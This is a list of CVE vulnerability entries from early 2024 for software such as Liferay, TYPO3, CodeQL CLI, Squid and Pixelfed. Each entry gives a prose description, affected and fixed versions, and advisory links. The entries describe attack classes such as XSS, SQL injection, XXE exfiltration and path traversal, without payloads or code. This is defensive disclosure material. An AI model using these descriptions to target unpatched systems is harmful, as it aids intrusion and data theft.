CVE 2024 25152 Candidate Stored cross-site scripting (XSS) vulnerability in Message Board widget in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the filename of an attachment. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25152 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25152 Assigned (20240206)
CVE 2024 25151 Candidate The Calendar module in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not escape user supplied data in the default notification email template, which allows remote authenticated users to inject arbitrary web script or HTML via the title of a calendar event or the user's name. This may lead to a content spoofing or cross-site scripting (XSS) attacks depending on the capability of the receiver's mail client. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25151 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25151 Assigned (20240206)
CVE 2024 25150 Candidate Information disclosure vulnerability in the Control Panel in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions allows remote authenticated users to obtain a user's full name from the page's title by enumerating user screen names. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25150 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25150 Assigned (20240206)
CVE 2024 2515 Candidate A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file home.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256952. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256952 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256952 | MISC:VDB-256952 | MAGESH-K21 Online-College-Event-Hall-Reservation-System home.php cross site scripting | URL:https://vuldb.com/?id.256952 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20home.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20home.php.md Assigned (20240315)
CVE 2024 25149 Candidate Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not properly restrict membership of a child site when the "Limit membership to members of the parent site" option is enabled, which allows remote authenticated users to add users who are not a member of the parent site to a child site. The added user may obtain permission to perform unauthorized actions in the child site. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25149 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25149 Assigned (20240206)
CVE 2024 25148 Candidate In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148 Assigned (20240206)
CVE 2024 25147 Candidate Cross-site scripting (XSS) vulnerability in HtmlUtil.escapeJsLink in Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via crafted javascript: style links. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25147 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25147 Assigned (20240206)
CVE 2024 25146 Candidate Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146 Assigned (20240206)
CVE 2024 25145 Candidate Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145 Assigned (20240206)
CVE 2024 25144 Candidate The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144 Assigned (20240206)
CVE 2024 25143 Candidate The Document and Media widget In Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143 Assigned (20240206)
CVE 2024 25141 Candidate When ssl was enabled for Mongo Hook, default settings included "allow_insecure" which caused that certificates were not validated. This was unexpected and undocumented. Users are recommended to upgrade to version 4.0.0, which fixes this issue. MISC:https://github.com/apache/airflow/pull/37214 | URL:https://github.com/apache/airflow/pull/37214 | MISC:https://lists.apache.org/thread/sqgbfqngjmn45ommmrgj7hvs7fgspsgm | URL:https://lists.apache.org/thread/sqgbfqngjmn45ommmrgj7hvs7fgspsgm | MLIST:[oss-security] 20240220 CVE-2024-25141: Apache Airflow Mongo Provider: Certificate validation isn't respected even if SSL is enabled for apache-airflow-providers-mongo | URL:http://www.openwall.com/lists/oss-security/2024/02/20/5 Assigned (20240206)
CVE 2024 25140 Candidate ** DISPUTED ** A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is "we do not have EV cert, so we use test cert as a workaround." Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation. MISC:https://github.com/rustdesk/rustdesk/discussions/6444 | MISC:https://news.ycombinator.com/item?id=39256493 | MISC:https://serverfault.com/questions/837994 Assigned (20240206)
CVE 2024 2514 Candidate A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256951. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256951 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256951 | MISC:VDB-256951 | MAGESH-K21 Online-College-Event-Hall-Reservation-System login.php sql injection | URL:https://vuldb.com/?id.256951 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20Auth%20bypass%20-%20login.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20Auth%20bypass%20-%20login.php.md Assigned (20240315)
CVE 2024 25139 Candidate In TP-Link Omada er605 1.0.1 through (v2.6) 2.2.3, a cloud-brd binary is susceptible to an integer overflow that leads to a heap-based buffer overflow. After heap shaping, an attacker can achieve code execution in the context of the cloud-brd binary that runs at the root level. This is fixed in ER605(UN)_v2_2.2.4 Build 020240119. MISC:https://github.com/microsoft/Microsoft-TP-Link-Research-Team | MISC:https://www.tp-link.com/us/omada-sdn/ Assigned (20240206)
CVE 2024 25130 Candidate Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.5.99.76 of Tuleap Community Edition and prior to versions 15.5-4 and 15.4-7 of Tuleap Enterprise Edition, users with a read access to a tracker where the mass update feature is used might get access to restricted information. Tuleap Community Edition 15.5.99.76, Tuleap Enterprise Edition 15.5-4, and Tuleap Enterprise Edition 15.4-7 contain a patch for this issue. MISC:https://github.com/Enalean/tuleap/commit/57978a32508f5c6d0365419b6eaeb368aee20667 | URL:https://github.com/Enalean/tuleap/commit/57978a32508f5c6d0365419b6eaeb368aee20667 | MISC:https://github.com/Enalean/tuleap/security/advisories/GHSA-mq7f-m6mj-hjj5 | URL:https://github.com/Enalean/tuleap/security/advisories/GHSA-mq7f-m6mj-hjj5 | MISC:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=57978a32508f5c6d0365419b6eaeb368aee20667 | URL:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=57978a32508f5c6d0365419b6eaeb368aee20667 | MISC:https://tuleap.net/plugins/tracker/?aid=36803 | URL:https://tuleap.net/plugins/tracker/?aid=36803 Assigned (20240205)
CVE 2024 25129 Candidate The CodeQL CLI repo holds binaries for the CodeQL command line interface (CLI). Prior to version 2.16.3, an XML parser used by the CodeQL CLI to read various auxiliary files is vulnerable to an XML External Entity attack. If a vulnerable version of the CLI is used to process either a maliciously modified CodeQL database, or a specially prepared set of QL query sources, the CLI can be made to make an outgoing HTTP request to an URL that contains material read from a local file chosen by the attacker. This may result in a loss of privacy of exfiltration of secrets. Security researchers and QL authors who receive databases or QL source files from untrusted sources may be impacted. A single untrusted `.ql` or `.qll` file cannot be affected, but a zip archive or tarball containing QL sources may unpack auxiliary files that will trigger an attack when CodeQL sees them in the file system. Those using CodeQL for routine analysis of source trees with a preselected set of trusted queries are not affected. In particular, extracting XML files from a source tree into the CodeQL database does not make one vulnerable. The problem is fixed in release 2.16.3 of the CodeQL CLI. Other than upgrading, workarounds include not accepting CodeQL databases or queries from untrusted sources, or only processing such material on a machine without an Internet connection. Customers who use older releases of CodeQL for security scanning in an automated CI system and cannot upgrade for compliance reasons can continue using that version. That use case is safe. If such customers have a private query pack and use the `codeql pack create` command to precompile them before using them in the CI system, they should be using the production CodeQL release to run `codeql pack create`. That command is safe as long as the QL source it precompiled is trusted. All other development of the query pack should use an upgraded CLI. MISC:https://github.com/github/codeql-cli-binaries/releases/tag/v2.16.3 | URL:https://github.com/github/codeql-cli-binaries/releases/tag/v2.16.3 | MISC:https://github.com/github/codeql-cli-binaries/security/advisories/GHSA-gf8p-v3g3-3wph | URL:https://github.com/github/codeql-cli-binaries/security/advisories/GHSA-gf8p-v3g3-3wph | MISC:https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql | URL:https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql Assigned (20240205)
CVE 2024 25128 Candidate Flask-AppBuilder is an application development framework, built on top of Flask. When Flask-AppBuilder is set to AUTH_TYPE AUTH_OID, it allows an attacker to forge an HTTP request, that could deceive the backend into using any requested OpenID service. This vulnerability could grant an attacker unauthorised privilege access if a custom OpenID service is deployed by the attacker and accessible by the backend. This vulnerability is only exploitable when the application is using the OpenID 2.0 authorization protocol. Upgrade to Flask-AppBuilder 4.3.11 to fix the vulnerability. MISC:https://github.com/dpgaspar/Flask-AppBuilder/commit/6336456d83f8f111c842b2b53d1e89627f2502c8 | URL:https://github.com/dpgaspar/Flask-AppBuilder/commit/6336456d83f8f111c842b2b53d1e89627f2502c8 | MISC:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-j2pw-vp55-fqqj | URL:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-j2pw-vp55-fqqj Assigned (20240205)
CVE 2024 25126 Candidate Rack is a modular Ruby web server interface. Carefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability (ReDos 2nd degree polynomial). This vulnerability is patched in 3.0.9.1 and 2.2.8.1. MISC:https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941 | URL:https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941 | MISC:https://github.com/rack/rack/commit/6efb2ceea003c4b195815a614e00438cbd543462 | URL:https://github.com/rack/rack/commit/6efb2ceea003c4b195815a614e00438cbd543462 | MISC:https://github.com/rack/rack/commit/d9c163a443b8cadf4711d84bd2c58cb9ef89cf49 | URL:https://github.com/rack/rack/commit/d9c163a443b8cadf4711d84bd2c58cb9ef89cf49 | MISC:https://github.com/rack/rack/security/advisories/GHSA-22f2-v57c-j9cx | URL:https://github.com/rack/rack/security/advisories/GHSA-22f2-v57c-j9cx | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-25126.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-25126.yml Assigned (20240205)
CVE 2024 25125 Candidate Digdag is an open source tool that to build, run, schedule, and monitor complex pipelines of tasks across various platforms. Treasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally. This issue may lead to information disclosure and has been addressed in release version 0.10.5.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/treasure-data/digdag/commit/eae89b0daf6c62f12309d8c7194454dfb18cc5c3 | URL:https://github.com/treasure-data/digdag/commit/eae89b0daf6c62f12309d8c7194454dfb18cc5c3 | MISC:https://github.com/treasure-data/digdag/security/advisories/GHSA-5mp4-32rr-v3x5 | URL:https://github.com/treasure-data/digdag/security/advisories/GHSA-5mp4-32rr-v3x5 Assigned (20240205)
CVE 2024 25124 Candidate Fiber is a web framework written in go. Prior to version 2.52.1, the CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (`*`) while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices. The impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references. Version 2.52.1 contains a patch for this issue. As a workaround, users may manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser fetch api, as well as browsers and utilities that enforce CORS policies, are not affected by this. MISC:http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html | URL:http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html | MISC:https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials | URL:https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials | MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials | URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials | MISC:https://fetch.spec.whatwg.org/#cors-protocol-and-credentials | URL:https://fetch.spec.whatwg.org/#cors-protocol-and-credentials | MISC:https://github.com/gofiber/fiber/commit/f0cd3b44b086544a37886232d0530601f2406c23 | URL:https://github.com/gofiber/fiber/commit/f0cd3b44b086544a37886232d0530601f2406c23 | MISC:https://github.com/gofiber/fiber/releases/tag/v2.52.1 | URL:https://github.com/gofiber/fiber/releases/tag/v2.52.1 | MISC:https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg | URL:https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg | MISC:https://saturncloud.io/blog/cors-cannot-use-wildcard-in-accesscontrolalloworigin-when-credentials-flag-is-true | URL:https://saturncloud.io/blog/cors-cannot-use-wildcard-in-accesscontrolalloworigin-when-credentials-flag-is-true Assigned (20240205)
CVE 2024 25123 Candidate MSS (Mission Support System) is an open source package designed for planning atmospheric research flights. In file: `index.py`, there is a method that is vulnerable to path manipulation attack. By modifying file paths, an attacker can acquire sensitive information from different resources. The `filename` variable is joined with other variables to form a file path in `_file`. However, `filename` is a route parameter that can capture path type values i.e. values including slashes (\). So it is possible for an attacker to manipulate the file being read by assigning a value containing ../ to `filename` and so the attacker may be able to gain access to other files on the host filesystem. This issue has been addressed in MSS version 8.3.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Open-MSS/MSS/commit/f23033729ee930b97f8bdbd07df0174311c9b658 | URL:https://github.com/Open-MSS/MSS/commit/f23033729ee930b97f8bdbd07df0174311c9b658 | MISC:https://github.com/Open-MSS/MSS/security/advisories/GHSA-pf2h-qjcr-qvq2 | URL:https://github.com/Open-MSS/MSS/security/advisories/GHSA-pf2h-qjcr-qvq2 Assigned (20240205)
CVE 2024 25122 Candidate sidekiq-unique-jobs is an open source project which prevents simultaneous Sidekiq jobs with the same unique arguments to run. Specially crafted GET request parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI, allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link, to successfully execute malicious code, which could potentially steal cookies, session data, or local storage data from the app the sidekiq-unique-jobs web UI is mounted in. 1. `/changelogs`, 2. `/locks` or 3. `/expiring_locks`. This issue has been addressed in versions 7.1.33 and 8.0.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed | URL:https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed | MISC:https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38 | URL:https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38 Assigned (20240205)
CVE 2024 25121 Candidate TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions of TYPO3 entities of the File Abstraction Layer (FAL) could be persisted directly via `DataHandler`. This allowed attackers to reference files in the fallback storage directly and retrieve their file names and contents. The fallback storage ("zero-storage") is used as a backward compatibility layer for files located outside properly configured file storages and within the public web root directory. Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 version 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, or 13.0.1 which fix the problem described. When persisting entities of the File Abstraction Layer directly via DataHandler, `sys_file` entities are now denied by default, and `sys_file_reference` & `sys_file_metadata` entities are not permitted to reference files in the fallback storage anymore. When importing data from secure origins, this must be explicitly enabled in the corresponding DataHandler instance by using `$dataHandler->isImporting = true;`. MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-rj3x-wvc6-5j66 | URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-rj3x-wvc6-5j66 | MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-006 | URL:https://typo3.org/security/advisory/typo3-core-sa-2024-006 Assigned (20240205)
CVE 2024 25120 Candidate TYPO3 is an open source PHP based web content management system released under the GNU GPL. The TYPO3-specific `t3://` URI scheme could be used to access resources outside of the users' permission scope. This encompassed files, folders, pages, and records (although only if a valid link-handling configuration was provided). Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this issue. MISC:https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Functions/Typolink.html#resource-references | URL:https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Functions/Typolink.html#resource-references | MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-wf85-8hx9-gj7c | URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-wf85-8hx9-gj7c | MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-005 | URL:https://typo3.org/security/advisory/typo3-core-sa-2024-005 Assigned (20240205)
CVE 2024 25119 Candidate TYPO3 is an open source PHP based web content management system released under the GNU GPL. The plaintext value of `$GLOBALS['SYS']['encryptionKey']` was displayed in the editing forms of the TYPO3 Install Tool user interface. This allowed attackers to utilize the value to generate cryptographic hashes used for verifying the authenticity of HTTP request parameters. Exploiting this vulnerability requires an administrator-level backend user account with system maintainer permissions. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this vulnerability. MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-h47m-3f78-qp9g | URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-h47m-3f78-qp9g | MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-004 | URL:https://typo3.org/security/advisory/typo3-core-sa-2024-004 Assigned (20240205)
CVE 2024 25118 Candidate TYPO3 is an open source PHP based web content management system released under the GNU GPL. Password hashes were being reflected in the editing forms of the TYPO3 backend user interface. This allowed attackers to crack the plaintext password using brute force techniques. Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this issue. MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-38r2-5695-334w | URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-38r2-5695-334w | MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-003 | URL:https://typo3.org/security/advisory/typo3-core-sa-2024-003 Assigned (20240205)
CVE 2024 25117 Candidate php-svg-lib is a scalable vector graphics (SVG) file parsing/rendering library. Prior to version 0.5.2, php-svg-lib fails to validate that font-family doesn't contain a PHAR url, which might leads to RCE on PHP < 8.0, and doesn't validate if external references are allowed. This might leads to bypass of restrictions or RCE on projects that are using it, if they do not strictly revalidate the fontName that is passed by php-svg-lib. The `Style::fromAttributes(`), or the `Style::parseCssStyle()` should check the content of the `font-family` and prevents it to use a PHAR url, to avoid passing an invalid and dangerous `fontName` value to other libraries. The same check as done in the `Style::fromStyleSheets` might be reused. Libraries using this library as a dependency might be vulnerable to some bypass of restrictions, or even remote code execution, if they do not double check the value of the `fontName` that is passed by php-svg-lib. Version 0.5.2 contains a fix for this issue. MISC:https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa | URL:https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa | MISC:https://github.com/dompdf/php-svg-lib/commit/8ffcc41bbde39f09f94b9760768086f12bbdce42 | URL:https://github.com/dompdf/php-svg-lib/commit/8ffcc41bbde39f09f94b9760768086f12bbdce42 | MISC:https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273 | URL:https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273 Assigned (20240205)
CVE 2024 25114 Candidate Collabora Online is a collaborative online office suite based on LibreOffice technology. Each document in Collabora Online is opened by a separate "Kit" instance in a different "jail" with a unique directory "jailID" name. For security reasons, this directory name is randomly generated and should not be given out to the client. In affected versions of Collabora Online it is possible to use the CELL() function, with the "filename" argument, in the spreadsheet component to get a path which includes this JailID. The impact of this vulnerability in its own is low because it requires to be chained with another vulnerability. Users should upgrade to Collabora Online 23.05.9; Collabora Online 22.05.22; Collabora Online 21.11.10 or higher. There are no known workarounds for this vulnerability. MISC:https://github.com/CollaboraOnline/online/security/advisories/GHSA-2fh2-ppjf-p3xv | URL:https://github.com/CollaboraOnline/online/security/advisories/GHSA-2fh2-ppjf-p3xv | MISC:https://github.com/LibreOffice/online/blob/master/wsd/README | URL:https://github.com/LibreOffice/online/blob/master/wsd/README Assigned (20240205)
CVE 2024 25113 Candidate ** REJECT ** This CVE was misassigned. See CVE-2023-47623 for the canonical reference. Assigned (20240205)
CVE 2024 25112 Candidate Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A denial-of-service was found in Exiv2 version v0.28.1: an unbounded recursion can cause Exiv2 to crash by exhausting the stack. The vulnerable function, `QuickTimeVideo::multipleEntriesDecoder`, was new in v0.28.0, so Exiv2 versions before v0.28 are _not_ affected. The denial-of-service is triggered when Exiv2 is used to read the metadata of a crafted video file. This bug is fixed in version v0.28.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Exiv2/exiv2/pull/2337 | URL:https://github.com/Exiv2/exiv2/pull/2337 | MISC:https://github.com/Exiv2/exiv2/security/advisories/GHSA-crmj-qh74-2r36 | URL:https://github.com/Exiv2/exiv2/security/advisories/GHSA-crmj-qh74-2r36 Assigned (20240205)
CVE 2024 25111 Candidate Squid is a web proxy cache. Starting in version 3.5.27 and prior to version 6.8, Squid may be vulnerable to a Denial of Service attack against HTTP Chunked decoder due to an uncontrolled recursion bug. This problem allows a remote attacker to cause Denial of Service when sending a crafted, chunked, encoded HTTP Message. This bug is fixed in Squid version 6.8. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. There is no workaround for this issue. MISC:http://www.squid-cache.org/Versions/v6/SQUID-2024_1.patch | URL:http://www.squid-cache.org/Versions/v6/SQUID-2024_1.patch | MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc | URL:https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc Assigned (20240205)
CVE 2024 25110 Candidate The UAMQP is a general purpose C library for AMQP 1.0. During a call to open_get_offered_capabilities, a memory allocation may fail causing a use-after-free issue and if a client called it during connection communication it may cause a remote code execution. Users are advised to update the submodule with commit `30865c9c`. There are no known workarounds for this vulnerability. MISC:https://github.com/Azure/azure-uamqp-c/commit/30865c9ccedaa32ddb036e87a8ebb52c3f18f695 | URL:https://github.com/Azure/azure-uamqp-c/commit/30865c9ccedaa32ddb036e87a8ebb52c3f18f695 | MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-c646-4whf-r67v | URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-c646-4whf-r67v Assigned (20240205)
CVE 2024 25109 Candidate ManageWiki is a MediaWiki extension allowing users to manage wikis. Special:ManageWiki does not escape escape interface messages on the `columns` and `help` keys on the form descriptor. An attacker may exploit this and would have a cross site scripting attack vector. Exploiting this on-wiki requires the `(editinterface)` right. Users should apply the code changes in commits `886cc6b94`, `2ef0f50880`, and `6942e8b2c` to resolve this vulnerability. There are no known workarounds for this vulnerability. MISC:https://github.com/miraheze/ManageWiki/commit/2ef0f50880d7695ca2874dc8dd515b2b9bbb02e5 | URL:https://github.com/miraheze/ManageWiki/commit/2ef0f50880d7695ca2874dc8dd515b2b9bbb02e5 | MISC:https://github.com/miraheze/ManageWiki/commit/6942e8b2c01dc33c2c41a471f91ef3f6ca726073 | URL:https://github.com/miraheze/ManageWiki/commit/6942e8b2c01dc33c2c41a471f91ef3f6ca726073 | MISC:https://github.com/miraheze/ManageWiki/commit/886cc6b94587f1c7387caa26ca9fe612e01836a0 | URL:https://github.com/miraheze/ManageWiki/commit/886cc6b94587f1c7387caa26ca9fe612e01836a0 | MISC:https://github.com/miraheze/ManageWiki/security/advisories/GHSA-4jr2-jhfm-2r84 | URL:https://github.com/miraheze/ManageWiki/security/advisories/GHSA-4jr2-jhfm-2r84 | MISC:https://issue-tracker.miraheze.org/T11812 | URL:https://issue-tracker.miraheze.org/T11812 Assigned (20240205)
CVE 2024 25108 Candidate Pixelfed is an open source photo sharing platform. When processing requests authorization was improperly and insufficiently checked, allowing attackers to access far more functionality than users intended, including to the administrative and moderator functionality of the Pixelfed server. This vulnerability affects every version of Pixelfed between v0.10.4 and v0.11.9, inclusive. A proof of concept of this vulnerability exists. This vulnerability affects every local user of a Pixelfed server, and can potentially affect the servers' ability to federate. Some user interaction is required to setup the conditions to be able to exercise the vulnerability, but the attacker could conduct this attack time-delayed manner, where user interaction is not actively required. This vulnerability has been addressed in version 0.11.11. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/pixelfed/pixelfed/commit/7e47d6dccb0393a2e95c42813c562c854882b037 | URL:https://github.com/pixelfed/pixelfed/commit/7e47d6dccb0393a2e95c42813c562c854882b037 | MISC:https://github.com/pixelfed/pixelfed/security/advisories/GHSA-gccq-h3xj-jgvf | URL:https://github.com/pixelfed/pixelfed/security/advisories/GHSA-gccq-h3xj-jgvf Assigned (20240205)
